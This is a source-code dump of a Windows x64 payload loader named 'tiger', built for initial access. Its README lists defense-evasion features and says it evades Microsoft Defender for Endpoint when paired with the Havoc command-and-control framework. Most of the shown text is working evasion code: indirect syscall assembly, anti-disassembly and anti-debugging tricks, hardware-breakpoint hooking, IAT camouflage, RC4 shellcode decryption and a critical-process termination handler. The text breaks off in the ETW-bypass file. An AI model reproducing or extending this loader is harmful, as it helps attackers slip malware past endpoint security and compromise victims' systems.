├── tiger ├── tiger.rc ├── ETW │ ├── etw.h │ └── etw.c ├── helloworld.bin ├── hooks │ ├── hwbp.h │ ├── exception_handler.h │ ├── hook_functions.h │ ├── hwbp.c │ ├── exception_handler.c │ └── hook_functions.c ├── helper_functions.h ├── anti-analysis │ ├── anti-debug.h │ ├── anti-disass.h │ ├── anti-disass-asm │ │ └── anti-disass-x64.asm │ ├── anti-disass.c │ └── anti-debug.c ├── mutex │ ├── mutex.h │ └── mutex.c ├── IAT │ ├── iat_camoflage.h │ └── iat_camoflage.c ├── encryption │ ├── xor.c │ ├── rc4.h │ ├── xor.h │ └── rc4.c ├── string_hashing.h ├── custom_loaderapi.h ├── helper_functions.c ├── resource.h ├── intrinsic.h ├── indir_syscall.asm ├── string_hashing.c ├── debug │ └── debug.h ├── indirect_syscall.h ├── custom_loaderapi.c ├── typedefs.h ├── tiger.vcxproj.filters ├── indirect_syscall.c ├── main.c ├── structs.h └── tiger.vcxproj ├── tiger_crypters ├── helloworld.bin ├── tiger_crypters.rc ├── encryption │ ├── xor.h │ ├── rc4.h │ ├── xor.cpp │ └── rc4.cpp ├── main.cpp ├── resource.h ├── tiger_crypters.vcxproj.filters ├── tiger_crypters.vcxproj └── structs.h ├── README.md ├── .gitattributes ├── tiger.sln └── .gitignore /tiger/tiger.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kr0ff/tiger/master/tiger/tiger.rc -------------------------------------------------------------------------------- /tiger/ETW/etw.h: -------------------------------------------------------------------------------- 1 | #include "../structs.h" 2 | 3 | BOOL DisableETW(DWORD64 dwEtwHash); -------------------------------------------------------------------------------- /tiger/helloworld.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kr0ff/tiger/master/tiger/helloworld.bin -------------------------------------------------------------------------------- /tiger_crypters/helloworld.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kr0ff/tiger/master/tiger_crypters/helloworld.bin -------------------------------------------------------------------------------- /tiger_crypters/tiger_crypters.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kr0ff/tiger/master/tiger_crypters/tiger_crypters.rc -------------------------------------------------------------------------------- /tiger/hooks/hwbp.h: -------------------------------------------------------------------------------- 1 | #include "../structs.h" 2 | 3 | BOOL HWBP(HANDLE hThread, DWORD64 AddrFunctionToHook, BOOL SetHWBP); -------------------------------------------------------------------------------- /tiger/helper_functions.h: -------------------------------------------------------------------------------- 1 | #include "structs.h" 2 | 3 | PVOID ZwMoveMemory( 4 | _Inout_ PVOID dest, 5 | _In_ const PVOID src, 6 | _In_ SIZE_T len 7 | ); -------------------------------------------------------------------------------- /tiger/anti-analysis/anti-debug.h: -------------------------------------------------------------------------------- 1 | #include "../structs.h" 2 | 3 | BOOL AntiDebugPEBCheck(); 4 | BOOL NtGlobalFlagCheck(VOID); 5 | BOOL DelayExecution(LONGLONG llNanoseconds); -------------------------------------------------------------------------------- /tiger/mutex/mutex.h: -------------------------------------------------------------------------------- 1 | #include "../structs.h" 2 | 3 | BOOL InitialiaseNTSyscalls(); 4 | 5 | HANDLE _CreateMutant(WCHAR* wMutantName); 6 | BOOL _DestroyMutant(HANDLE hMutant); -------------------------------------------------------------------------------- /tiger_crypters/encryption/xor.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void xor_cryptA(unsigned char str[], unsigned char key, DWORD size); 5 | void xor_cryptW(WCHAR str[], WCHAR key); -------------------------------------------------------------------------------- /tiger/IAT/iat_camoflage.h: -------------------------------------------------------------------------------- 1 | #pragma warning ( disable : 4047) 2 | #include "../structs.h" 3 | #include "../typedefs.h" 4 | 5 | // Camoflage IAT with benign APIs 6 | BOOL camoflage_IAT(); 7 | // Fibonachi counter 8 | void phibosachi(int n); 9 | -------------------------------------------------------------------------------- /tiger/encryption/xor.c: -------------------------------------------------------------------------------- 1 | #include "xor.h" 2 | 3 | void xor_cryptA(unsigned char str[], unsigned char key, SIZE_T _size) { 4 | 5 | SIZE_T i = 0; 6 | for (i; i < _size; i++) { 7 | str[i] = str[i] ^ key; 8 | } 9 | 10 | return; 11 | } -------------------------------------------------------------------------------- /tiger/encryption/rc4.h: -------------------------------------------------------------------------------- 1 | #include "../structs.h" 2 | #include "../ntstatus.h" 3 | 4 | NTSTATUS WINAPI SystemFunction032(struct ustring* data, const struct ustring* key); 5 | NTSTATUS CryptMemory032(PVOID memoryAddr, SIZE_T memoryblkSize, char* key, SIZE_T keySize); -------------------------------------------------------------------------------- /tiger/anti-analysis/anti-disass.h: -------------------------------------------------------------------------------- 1 | void AntiDisassmConstantCondition(); 2 | void AntiDisassmAsmJmpSameTarget(); 3 | void AntiDisassmImpossibleDiasassm(); 4 | void AntiDisassmFunctionPointer(); 5 | void AntiDisassmReturnPointerAbuse(); 6 | void AntiDisassmSEHMisuse(); -------------------------------------------------------------------------------- /tiger/string_hashing.h: -------------------------------------------------------------------------------- 1 | #include "structs.h" 2 | 3 | #define CRC32B(str) crc32b(str) 4 | #define CRC32H(message) crc32h(message) 5 | #define DJB2(str) djb2(str) 6 | 7 | DWORD64 crc32b(PBYTE str); 8 | DWORD64 crc32h(unsigned char* message); 9 | DWORD64 djb2(PBYTE str); -------------------------------------------------------------------------------- /tiger/custom_loaderapi.h: -------------------------------------------------------------------------------- 1 | #include "structs.h" 2 | 3 | #define _GetModuleHandle Custom_GetModuleHandle 4 | #define _GetProcAddress Custom_GetProcAddress 5 | 6 | HMODULE Custom_GetModuleHandle(DWORD64 ModuleHash); 7 | FARPROC Custom_GetProcAddress(HMODULE hModule, DWORD64 ApiHash); 8 | 9 | -------------------------------------------------------------------------------- /tiger/encryption/xor.h: -------------------------------------------------------------------------------- 1 | #include "../structs.h" 2 | 3 | #define XORA(str, _key, _size) xor_cryptA(str, _key, _size) 4 | void xor_cryptA(unsigned char str[], unsigned char key, SIZE_T size); 5 | 6 | //#define XORW(wstr, _key) xor_cryptW(wstr, _key) 7 | //void xor_cryptW(WCHAR str[], WCHAR wkey); -------------------------------------------------------------------------------- /tiger_crypters/encryption/rc4.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "ntstatus.h" 3 | #include "../structs.h" 4 | 5 | typedef struct ustring { 6 | DWORD Length; 7 | DWORD MaximumLength; 8 | PUCHAR Buffer; 9 | } data, key; 10 | 11 | 12 | typedef NTSTATUS(NTAPI* t_SystemFunction032) 13 | ( 14 | struct ustring* data, 15 | const struct ustring* key 16 | ); 17 | 18 | BOOL _CryptMemory032(); -------------------------------------------------------------------------------- /tiger/helper_functions.c: -------------------------------------------------------------------------------- 1 | #include "helper_functions.h" 2 | 3 | PVOID ZwMoveMemory(PVOID dest, const PVOID src, SIZE_T len) { 4 | char* d = (char*)dest; 5 | char* s = (char*)src; 6 | 7 | if (d < s) 8 | while (len--) 9 | *d++ = *s++; 10 | else { 11 | char* lasts = s + (len - 1); 12 | char* lastd = d + (len - 1); 13 | while (len--) 14 | *lastd-- = *lasts--; 15 | } 16 | return dest; 17 | } -------------------------------------------------------------------------------- /tiger/hooks/exception_handler.h: -------------------------------------------------------------------------------- 1 | #include "../structs.h" 2 | 3 | #define SET_HANDLERINFO(OriginalFunctionRip, HookFunctionRip) (set_handlerinfo(OriginalFunctionRip, HookFunctionRip)) 4 | 5 | //LONG WINAPI e_handler(EXCEPTION_POINTERS* ExceptionInfo, DWORD64 OriginalFunctionRip, DWORD64 HookFunctionRip); 6 | LONG WINAPI e_handler(EXCEPTION_POINTERS* ExceptionInfo); 7 | int set_handlerinfo(DWORD64 OriginalFunctionRip, DWORD64 HookFunctionRip); -------------------------------------------------------------------------------- /tiger/hooks/hook_functions.h: -------------------------------------------------------------------------------- 1 | #include "../structs.h" 2 | 3 | #define SET_SCADDRESS(hProcess, pScAddress, sSize, dwProtection) (set_scaddress(hProcess, pScAddress, sSize, dwProtection)) 4 | 5 | // Jump function for WinAPI() 6 | BOOL set_scaddress(HANDLE hProcess, PVOID pScAddress, SIZE_T sSize, ULONG dwProtection); 7 | //void __stdcall hook_Sleep(DWORD dwMilliseconds); 8 | int __stdcall hook_MessageBox(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType); -------------------------------------------------------------------------------- /tiger/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by tiger.rc 4 | // 5 | #define IDR_SCODE1 101 6 | 7 | // Next default values for new objects 8 | // 9 | #ifdef APSTUDIO_INVOKED 10 | #ifndef APSTUDIO_READONLY_SYMBOLS 11 | #define _APS_NEXT_RESOURCE_VALUE 102 12 | #define _APS_NEXT_COMMAND_VALUE 40001 13 | #define _APS_NEXT_CONTROL_VALUE 1001 14 | #define _APS_NEXT_SYMED_VALUE 101 15 | #endif 16 | #endif 17 | -------------------------------------------------------------------------------- /tiger_crypters/main.cpp: -------------------------------------------------------------------------------- 1 | #include "encryption/rc4.h" 2 | #include "encryption/xor.h" 3 | 4 | int wmain(int argc, wchar_t* argv[]) { 5 | 6 | // Modifications done in rc4.cpp 7 | _CryptMemory032(); 8 | 9 | unsigned char bytes[] = { 10 | 0x31, 0xc0, 11 | 0xc3 12 | }; 13 | 14 | // XOR encrypted using 'A' = 0x41 as key 15 | unsigned char xbytes[] = { 0x70,0x81,0x82 }; 16 | 17 | DWORD _size = sizeof(bytes); 18 | 19 | unsigned char _key = 0x86; 20 | //xor_cryptA(bytes, _key, _size); 21 | 22 | return 0; 23 | } -------------------------------------------------------------------------------- /tiger_crypters/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by tiger_crypters.rc 4 | // 5 | #define IDR_SCODE1 101 6 | 7 | // Next default values for new objects 8 | // 9 | #ifdef APSTUDIO_INVOKED 10 | #ifndef APSTUDIO_READONLY_SYMBOLS 11 | #define _APS_NEXT_RESOURCE_VALUE 102 12 | #define _APS_NEXT_COMMAND_VALUE 40001 13 | #define _APS_NEXT_CONTROL_VALUE 1001 14 | #define _APS_NEXT_SYMED_VALUE 101 15 | #endif 16 | #endif 17 | -------------------------------------------------------------------------------- /tiger_crypters/encryption/xor.cpp: -------------------------------------------------------------------------------- 1 | #include "xor.h" 2 | 3 | void xor_cryptA(unsigned char str[], unsigned char key, DWORD size) { 4 | 5 | //DWORD sizeStr = sizeof(str); 6 | unsigned char xor_d[] = { 0 }; 7 | 8 | DWORD i = 0; 9 | for (i; i < size; i++) { 10 | str[i] = str[i] ^ key; 11 | printf("\\x%02x", str[i]); 12 | } 13 | 14 | return; 15 | } 16 | 17 | void xor_cryptW(WCHAR wstr[], WCHAR key) { 18 | size_t sizeWStr = wcslen(wstr); 19 | WCHAR wxord[] = { 0 }; 20 | 21 | int i = 0; 22 | for (i; i < sizeWStr; i++) { 23 | wxord[i] = wstr[i] ^ key; 24 | //wxord[i]++; 25 | wprintf(L"\\x%02x", wxord[i]); 26 | } 27 | return; 28 | } -------------------------------------------------------------------------------- /tiger/intrinsic.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | // The `extern` keyword sets the `memset` function as an external function. 3 | extern void* __cdecl memset(void* Destination, int Value, size_t Size); 4 | 5 | // The `#pragma intrinsic(memset)` and #pragma function(memset) macros are Microsoft-specific compiler instructions. 6 | // They force the compiler to generate code for the memset function using a built-in intrinsic function. 7 | #pragma intrinsic(memset) 8 | #pragma function(memset) 9 | 10 | void* __cdecl memset(void* Destination, int Value, size_t Size) { 11 | // logic similar to memset's one 12 | unsigned char* p = (unsigned char*)Destination; 13 | while (Size > 0) { 14 | *p = (unsigned char)Value; 15 | p++; 16 | Size--; 17 | } 18 | return Destination; 19 | } -------------------------------------------------------------------------------- /tiger/anti-analysis/anti-disass-asm/anti-disass-x64.asm: -------------------------------------------------------------------------------- 1 | 2 | .code 3 | 4 | __AsmConstantCondition proc 5 | xor rax, rax 6 | jz L_END 7 | db 0e8h 8 | L_END: 9 | nop 10 | ret 11 | __AsmConstantCondition endp 12 | 13 | 14 | __AsmJmpSameTarget proc 15 | jz L_END 16 | jnz L_END 17 | db 0e8h 18 | L_END: 19 | nop 20 | ret 21 | __AsmJmpSameTarget endp 22 | 23 | 24 | __AsmImpossibleDisassm proc 25 | push rax 26 | 27 | mov ax, 05EBh ; db 066h, 0B8h, 0EBh, 005h 28 | xor eax, eax ; db 033h, 0C0h 29 | db 074h, 0fah 30 | db 0e8h ; call 31 | 32 | pop rax 33 | ret 34 | __AsmImpossibleDisassm endp 35 | 36 | ; a dummy function 37 | func2 proc 38 | mov rax, r8 39 | shl rax, 2 40 | ret 41 | func2 endp 42 | 43 | 44 | __AsmFunctionPointer proc 45 | push rax 46 | push rcx 47 | push rsi 48 | mov rcx, offset func2 49 | mov r8, 02h 50 | call rcx 51 | mov rsi, rax 52 | mov r8, 03h 53 | call rcx 54 | lea rax, [rsi+rax+1] 55 | pop rsi 56 | pop rcx 57 | pop rax 58 | ret 59 | __AsmFunctionPointer endp 60 | 61 | 62 | __AsmReturnPointerAbuse proc 63 | call $+5 64 | add qword ptr[rsp], 6 65 | ret 66 | 67 | push rax 68 | mov rax, rcx 69 | imul rax, 40h 70 | pop rax 71 | ret 72 | __AsmReturnPointerAbuse endp 73 | 74 | 75 | end -------------------------------------------------------------------------------- /tiger/indir_syscall.asm: -------------------------------------------------------------------------------- 1 | .data 2 | wSystemCall DWORD 0000h 3 | qSyscallInsAdress QWORD 0h 4 | .code 5 | 6 | SetSSN PROC 7 | xor eax, eax ; eax = 0 8 | mov wSystemCall, eax ; wSystemCall = 0 9 | mov qSyscallInsAdress, rax ; qSyscallInsAdress = 0 10 | mov eax, ecx ; eax = ssn 11 | mov wSystemCall, eax ; wSystemCall = eax = ssn 12 | mov r8, rdx ; r8 = AddressOfASyscallInst 13 | mov qSyscallInsAdress, r8 ; qSyscallInsAdress = r8 = AddressOfASyscallInst 14 | ret 15 | SetSSN ENDP 16 | 17 | RunSyscall PROC 18 | xor r10, r10 ; r10 = 0 19 | mov rax, rcx ; rax = rcx 20 | mov r10, rax ; r10 = rax = rcx 21 | mov eax, wSystemCall ; eax = ssn 22 | jmp Run ; execute 'Run' 23 | xor eax, eax ; wont run 24 | xor rcx, rcx ; wont run 25 | shl r10, 2 ; wont run 26 | Run: 27 | jmp qword ptr [qSyscallInsAdress] ; jumping to the 'syscall' instruction 28 | xor r10, r10 ; r10 = 0 29 | mov qSyscallInsAdress, r10 ; qSyscallInsAdress = 0 30 | ret 31 | RunSyscall ENDP 32 | 33 | end 34 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # tiger 2 | 3 | Tiger is a initial access payload loader for Win64. It has the following features: 4 | 5 | * Indirect Syscalls using TartarusGate [✅] 6 | * Anti-Disassembly [✅] 7 | * Anti-Debugging [✅] 8 | * Memory hiding via hardware breakpoints [✅] 9 | * RC4 Encryption of shellcode [✅] 10 | * Payload exec monitoring via NtCreateMutant [✅] 11 | * Import Address Table (IAT) camoflage [✅] 12 | * String hashing (CRC32B) [✅] 13 | * ETW Bypass via byte patch [✅] 14 | * Maybe more to add... ? 15 | 16 | As of now the payload works great against MDE (no block mode tested only) with Havoc. The code could likely be modified to use a different method of memory allocation, prevent creation of user thread or even inject directly into a sacrificial process that does PPID spoofing and has a `PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON`. Self-deletion of the initial access payload might work as well to prevent the binary from persisting on disk after execution. 17 | 18 | For more advanced features, call stack spoofing could be implemented as well however, this is pretty advanced and I have no clue how that could work or to even implement. 19 | 20 | # Disclaimer 21 | The creator of this program does not hold liability of how this code is used. This is was created purely for educational purposes only and should only be used in a safe and secure environment where permissions have been granted by the owner. 22 | -------------------------------------------------------------------------------- /tiger/string_hashing.c: -------------------------------------------------------------------------------- 1 | #include "string_hashing.h" 2 | 3 | DWORD64 crc32b(PBYTE str) { 4 | // Source: https://stackoverflow.com/a/21001712 5 | DWORD64 byte, crc, mask; 6 | int i = 0, j; 7 | crc = 0xFFFFFFFF; 8 | while (str[i] != 0) { 9 | byte = str[i]; 10 | crc = crc ^ byte; 11 | for (j = 7; j >= 0; j--) { 12 | mask = -((int)crc & 1); 13 | crc = (crc >> 1) ^ (0xEDB88320 & mask); 14 | } 15 | i = i + 1; 16 | } 17 | return ~crc; 18 | } 19 | 20 | #define CRC32HSEED 0xEDB88320 21 | 22 | DWORD64 crc32h(unsigned char* message) { 23 | //Source: https://web.archive.org/web/20190108202303/http://www.hackersdelight.org/hdcodetxt/crc.c.txt 24 | int i, crc; 25 | unsigned int byte, c; 26 | const unsigned int g0 = CRC32HSEED, g1 = g0 >> 1, 27 | g2 = g0 >> 2, g3 = g0 >> 3, g4 = g0 >> 4, g5 = g0 >> 5, 28 | g6 = (g0 >> 6) ^ g0, g7 = ((g0 >> 6) ^ g0) >> 1; 29 | 30 | i = 0; 31 | crc = 0xFFFFFFFF; 32 | while ((byte = message[i]) != 0) { // Get next byte. 33 | crc = crc ^ byte; 34 | c = ((crc << 31 >> 31) & g7) ^ ((crc << 30 >> 31) & g6) ^ 35 | ((crc << 29 >> 31) & g5) ^ ((crc << 28 >> 31) & g4) ^ 36 | ((crc << 27 >> 31) & g3) ^ ((crc << 26 >> 31) & g2) ^ 37 | ((crc << 25 >> 31) & g1) ^ ((crc << 24 >> 31) & g0); 38 | crc = ((unsigned)crc >> 8) ^ c; 39 | i = i + 1; 40 | } 41 | return ~crc; 42 | } 43 | 44 | DWORD64 djb2(PBYTE str) { 45 | DWORD64 dwHash = 0x35333831; 46 | INT c; 47 | 48 | while (c = *str++) 49 | dwHash = ((dwHash << 0x5) + dwHash) + c; 50 | 51 | return dwHash; 52 | } 53 | -------------------------------------------------------------------------------- /tiger/hooks/hwbp.c: -------------------------------------------------------------------------------- 1 | #include "hwbp.h" 2 | #include "exception_handler.h" 3 | #include "../indirect_syscall.h" 4 | 5 | #include "../debug/debug.h" 6 | 7 | NTAPI_FUNC _G_NTFUNC; 8 | 9 | BOOL HWBP(HANDLE hThread, DWORD64 AddrFunctionToHook, BOOL SetHWBP) { 10 | 11 | BOOL res = FALSE; 12 | NTSTATUS STATUS = NULL; 13 | 14 | CONTEXT ctx = { 0 }; 15 | ctx.ContextFlags = CONTEXT_ALL; 16 | 17 | if (!ObtainSyscall(NTGETCONTEXTTHREAD_HASH, &_G_NTFUNC.NtGetContextThread)) { 18 | return -1; 19 | } 20 | SET_SYSCALL(_G_NTFUNC.NtGetContextThread); 21 | if ((STATUS = RunSyscall(hThread, &ctx)) != 0x00) { 22 | #ifdef DEBUG 23 | PRINTA("[-] Syscall failed with status: 0x%0.8X\n", STATUS); 24 | #endif 25 | return -1; 26 | } 27 | 28 | switch (SetHWBP) { 29 | case TRUE: 30 | #ifdef DEBUG 31 | PRINTA("[+] HWBP Set ! \n"); 32 | #endif 33 | ctx.Dr0 = AddrFunctionToHook; 34 | ctx.Dr7 |= (1 << 0); // Break at DR0 35 | ctx.Dr7 &= ~(1 << 16); // Break on execution 36 | ctx.Dr7 &= ~(1 << 17); 37 | res = TRUE; 38 | break; 39 | 40 | case FALSE: 41 | #ifdef DEBUG 42 | PRINTA("[-] Unset HWBP !\n"); 43 | #endif 44 | 45 | ctx.Dr0 = NULL; // Clear DR0 46 | ctx.Dr7 &= ~(1 << 0); // Clear DR7 47 | res = FALSE; 48 | break; 49 | } 50 | 51 | // Set the context flag to work with debug registers 52 | // Then write the new context of the thread 53 | ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS; 54 | 55 | if (!ObtainSyscall(NTSETCONTEXTTHREAD_HASH, &_G_NTFUNC.NtSetContextThread)) { 56 | return -1; 57 | } 58 | SET_SYSCALL(_G_NTFUNC.NtSetContextThread); 59 | if ((STATUS = RunSyscall(hThread, &ctx)) != 0x00) { 60 | #ifdef DEBUG 61 | PRINTA("[-] Syscall failed with status: 0x%0.8X\n", STATUS); 62 | #endif 63 | return -1; 64 | } 65 | } -------------------------------------------------------------------------------- /tiger/IAT/iat_camoflage.c: -------------------------------------------------------------------------------- 1 | #include "iat_camoflage.h" 2 | 3 | BOOL camoflage_IAT() { 4 | 5 | BOOL res = FALSE; 6 | 7 | // APIs obtained from notepad.exe's imports 8 | unsigned __int64 api = GetUserDefaultUILanguage; 9 | api = MulDiv; 10 | api = CloseHandle; 11 | api = GetACP; 12 | api = WideCharToMultiByte; 13 | api = GetFocus; 14 | api = GetLastError; 15 | api = WaitForSingleObjectEx; 16 | api = GetTimeFormatW; 17 | api = GetDateFormatW; 18 | api = QueryPerformanceCounter; 19 | api = IsProcessorFeaturePresent; 20 | api = EnumFontsW; 21 | api = GetTextFaceW; 22 | 23 | int r = 0; 24 | int prev = 0; 25 | 26 | for (int i = 0; i < LP1; i++) { 27 | for (int o = 0; o < LP2; o++) { 28 | if ((o % 2) == 0) { 29 | prev = o; 30 | 31 | if (o == prev) { 32 | o++; 33 | } 34 | r = o; 35 | phibosachi(r); 36 | } 37 | } 38 | } 39 | 40 | res = TRUE; 41 | 42 | return res; 43 | } 44 | 45 | void phibosachi(int n) 46 | { 47 | if (n < 1) { 48 | return; 49 | } 50 | 51 | // when number of terms is greater than 0 52 | int prev1 = 1; 53 | int prev2 = 0; 54 | 55 | // for loop to print fibonacci series 56 | for (int i = 1; i <= n; i++) { 57 | if (i > 2) { 58 | int num = prev1 + prev2; 59 | prev2 = prev1; 60 | prev1 = num; 61 | //printf("%d ", num); 62 | } 63 | 64 | // for first two terms 65 | if (i == 1) { 66 | //printf("%d ", prev2); 67 | } 68 | if (i == 2) { 69 | //printf("%d ", prev1); 70 | } 71 | } 72 | 73 | return; 74 | } -------------------------------------------------------------------------------- /tiger/debug/debug.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #define FALSE 0 3 | #define TRUE 1 4 | 5 | #define DEBUG 6 | 7 | #ifdef DEBUG 8 | 9 | // wprintf replacement 10 | #define PRINTW( STR, ... ) \ 11 | if (1) { \ 12 | LPWSTR buf = (LPWSTR)HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, 1024 ); \ 13 | if ( buf != NULL ) { \ 14 | int len = wsprintfW( buf, STR, __VA_ARGS__ ); \ 15 | WriteConsoleW( GetStdHandle( STD_OUTPUT_HANDLE ), buf, len, NULL, NULL ); \ 16 | HeapFree( GetProcessHeap(), 0, buf ); \ 17 | } \ 18 | } 19 | 20 | 21 | // printf replacement 22 | #define PRINTA( STR, ... ) \ 23 | if (1) { \ 24 | LPSTR buf = (LPSTR)HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, 1024 ); \ 25 | if ( buf != NULL ) { \ 26 | int len = wsprintfA( buf, STR, __VA_ARGS__ ); \ 27 | WriteConsoleA( GetStdHandle( STD_OUTPUT_HANDLE ), buf, len, NULL, NULL ); \ 28 | HeapFree( GetProcessHeap(), 0, buf ); \ 29 | } \ 30 | } 31 | #endif -------------------------------------------------------------------------------- /tiger/indirect_syscall.h: -------------------------------------------------------------------------------- 1 | #include "structs.h" 2 | #include "string_hashing.h" 3 | #include "typedefs.h" 4 | 5 | extern VOID SetSSN(DWORD dwSSN, PVOID pRandSyscallAddress); 6 | extern LONG RunSyscall(); 7 | 8 | #define SET_SYSCALL(pNtSys) (SetSSN((DWORD)pNtSys.dwSSN,(PVOID)pNtSys.pRandSyscallAddress)) 9 | 10 | typedef struct _NTSYSCALL { 11 | DWORD dwSSN; // syscall number 12 | DWORD64 dwSyscallHash; // syscall hash value 13 | PVOID pSyscallAddress; // syscall address 14 | PVOID pRandSyscallAddress; // address of a random 'syscall' instruction in ntdll 15 | 16 | } NTSYSCALL, *PNTSYSCALL; 17 | 18 | typedef struct _NTDLL_STRUCT 19 | { 20 | PDWORD pdwArrayOfAddresses; // The VA of the array of addresses of ntdll's exported functions 21 | PDWORD pdwArrayOfNames; // The VA of the array of names of ntdll's exported functions 22 | PWORD pwArrayOfOrdinals; // The VA of the array of ordinals of ntdll's exported functions 23 | DWORD dwNumberOfNames; // The number of exported functions from ntdll.dll 24 | ULONG_PTR uModule; // The base address of ntdll - requred to calculated future RVAs 25 | 26 | } NTDLL_STRUCT, *PNTDLL_STRUCT; 27 | 28 | typedef struct _NTAPI_FUNC 29 | { 30 | NTSYSCALL NtAllocateVirtualMemory; 31 | NTSYSCALL NtProtectVirtualMemory; 32 | NTSYSCALL NtCreateThreadEx; 33 | NTSYSCALL NtWaitForSingleObject; 34 | NTSYSCALL NtDelayExecution; 35 | NTSYSCALL NtCreateMutant; 36 | NTSYSCALL NtOpenMutant; 37 | NTSYSCALL NtReleaseMutant; 38 | NTSYSCALL NtClose; 39 | NTSYSCALL NtGetContextThread; 40 | NTSYSCALL NtSetContextThread; 41 | 42 | }NTAPI_FUNC, * PNTAPI_FUNC; 43 | 44 | BOOL ObtainSyscall(IN DWORD64 dwSysHash, OUT PNTSYSCALL pNtSys); 45 | BOOL InitNtdllStruct(); 46 | BOOL InitializeNtSyscalls(); 47 | -------------------------------------------------------------------------------- /tiger/anti-analysis/anti-disass.c: -------------------------------------------------------------------------------- 1 | #include "anti-disass.h" 2 | #include "../structs.h" 3 | 4 | extern void __AsmConstantCondition(); 5 | extern void __AsmJmpSameTarget(); 6 | extern void __AsmImpossibleDisassm(); 7 | extern void __AsmFunctionPointer(DWORD); 8 | extern void __AsmReturnPointerAbuse(DWORD64); 9 | 10 | #ifndef _WIN64 11 | extern void __AsmSEHMisuse(); 12 | #endif 13 | 14 | /* 15 | This technique is composed of a single conditional jump instruction placed where the condition 16 | will always be the same. 17 | */ 18 | void AntiDisassmConstantCondition() 19 | { 20 | __AsmConstantCondition(); 21 | } 22 | 23 | /* 24 | The most common anti-disassembly technique seen in the wild is two back-to back 25 | conditional jump instructions that both point to the same target. For example, 26 | if a jz XYZ is followed by jnz XYZ, the location XYZ will always be jumped to 27 | */ 28 | void AntiDisassmAsmJmpSameTarget() 29 | { 30 | __AsmJmpSameTarget(); 31 | } 32 | 33 | 34 | /* 35 | By using a data byte placed strategically after a conditional jump instruction 36 | with the idea that disassembly starting at this byte will prevent the real instruction 37 | that follows from being disassembled because the byte that inserted is the opcode for 38 | a multibyte instruction. 39 | 40 | */ 41 | void AntiDisassmImpossibleDiasassm() 42 | { 43 | __AsmImpossibleDisassm(); 44 | } 45 | 46 | 47 | /* 48 | If function pointers are used in handwritten assembly or crafted in a nonstandard way 49 | in source code, the results can be difficult to reverse engineer without dynamic analysis. 50 | */ 51 | void AntiDisassmFunctionPointer() 52 | { 53 | 54 | DWORD Number = 2; 55 | __AsmFunctionPointer(Number); 56 | } 57 | 58 | 59 | /* 60 | The most obvious result of this technique is that the disassembler doesn't show any 61 | code cross - reference to the target being jumped to. 62 | */ 63 | void AntiDisassmReturnPointerAbuse() 64 | { 65 | __AsmReturnPointerAbuse(666); 66 | } 67 | 68 | #ifndef _WIN64 69 | void AntiDisassmSEHMisuse() 70 | { 71 | __AsmSEHMisuse(); 72 | } 73 | #endif -------------------------------------------------------------------------------- /tiger/hooks/exception_handler.c: -------------------------------------------------------------------------------- 1 | #include "exception_handler.h" 2 | 3 | #include "../typedefs.h" 4 | #include "../custom_loaderapi.h" 5 | 6 | #include "../debug/debug.h" 7 | 8 | DWORD64 _G_OriginalFunctionRip; 9 | DWORD64 _G_HookFunctionRip; 10 | 11 | int set_handlerinfo(DWORD64 OriginalFunctionRip, DWORD64 HookFunctionRip) { 12 | if (OriginalFunctionRip == 0 || HookFunctionRip == 0) { 13 | return -1; 14 | } 15 | 16 | _G_OriginalFunctionRip = OriginalFunctionRip; 17 | _G_HookFunctionRip = HookFunctionRip; 18 | 19 | return 0; 20 | } 21 | 22 | LONG WINAPI e_handler(EXCEPTION_POINTERS* ExceptionInfo) { 23 | 24 | t_RtlSetProcessIsCritical SetCriticalProcess = 25 | (t_RtlSetProcessIsCritical)_GetProcAddress(_GetModuleHandle(NTDLL_HASH), RTLSETPROCESSISCRITICAL_HASH); 26 | t_TerminateProcess TerminateProcess = (t_TerminateProcess)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), TERMINTATEPROCESS_HASH); 27 | 28 | 29 | // Check EXCEPTION_POINTERS dont result in ACCESS_VIOLATION 30 | if (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) { 31 | #ifdef DEBUG 32 | PRINTA("[-] Exception handler ACCESS_VIOLATION Hit ( Code: %d )\n", ExceptionInfo->ExceptionRecord->ExceptionCode); 33 | #endif 34 | SetCriticalProcess(TRUE, NULL, FALSE); 35 | TerminateProcess(NtCurrentProcess(), -1); 36 | 37 | return EXCEPTION_NONCONTINUABLE; 38 | } 39 | 40 | if (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) { 41 | if (ExceptionInfo->ContextRecord->Rip == _G_OriginalFunctionRip) { 42 | #ifdef DEBUG 43 | PRINTA("[+] Exception caught -> Hit ( 0x%p )\n", ExceptionInfo->ContextRecord->Rip); 44 | #endif 45 | 46 | // Set EFlags to resume execution 47 | ExceptionInfo->ContextRecord->EFlags |= (1 << 16); 48 | // Point to the custom (hook) function 49 | ExceptionInfo->ContextRecord->Rip = _G_HookFunctionRip; 50 | 51 | // Alternatively, can skip the breakpoint by incrementing the RIP register 52 | //ExceptionInfo->ContextRecord->Rip++; 53 | } 54 | return EXCEPTION_CONTINUE_EXECUTION; 55 | } 56 | return EXCEPTION_CONTINUE_SEARCH; 57 | 58 | } -------------------------------------------------------------------------------- /tiger/ETW/etw.c: -------------------------------------------------------------------------------- 1 | #include "etw.h" 2 | #include "../typedefs.h" 3 | #include "../encryption/xor.h" 4 | #include "../custom_loaderapi.h" 5 | #include "../indirect_syscall.h" 6 | 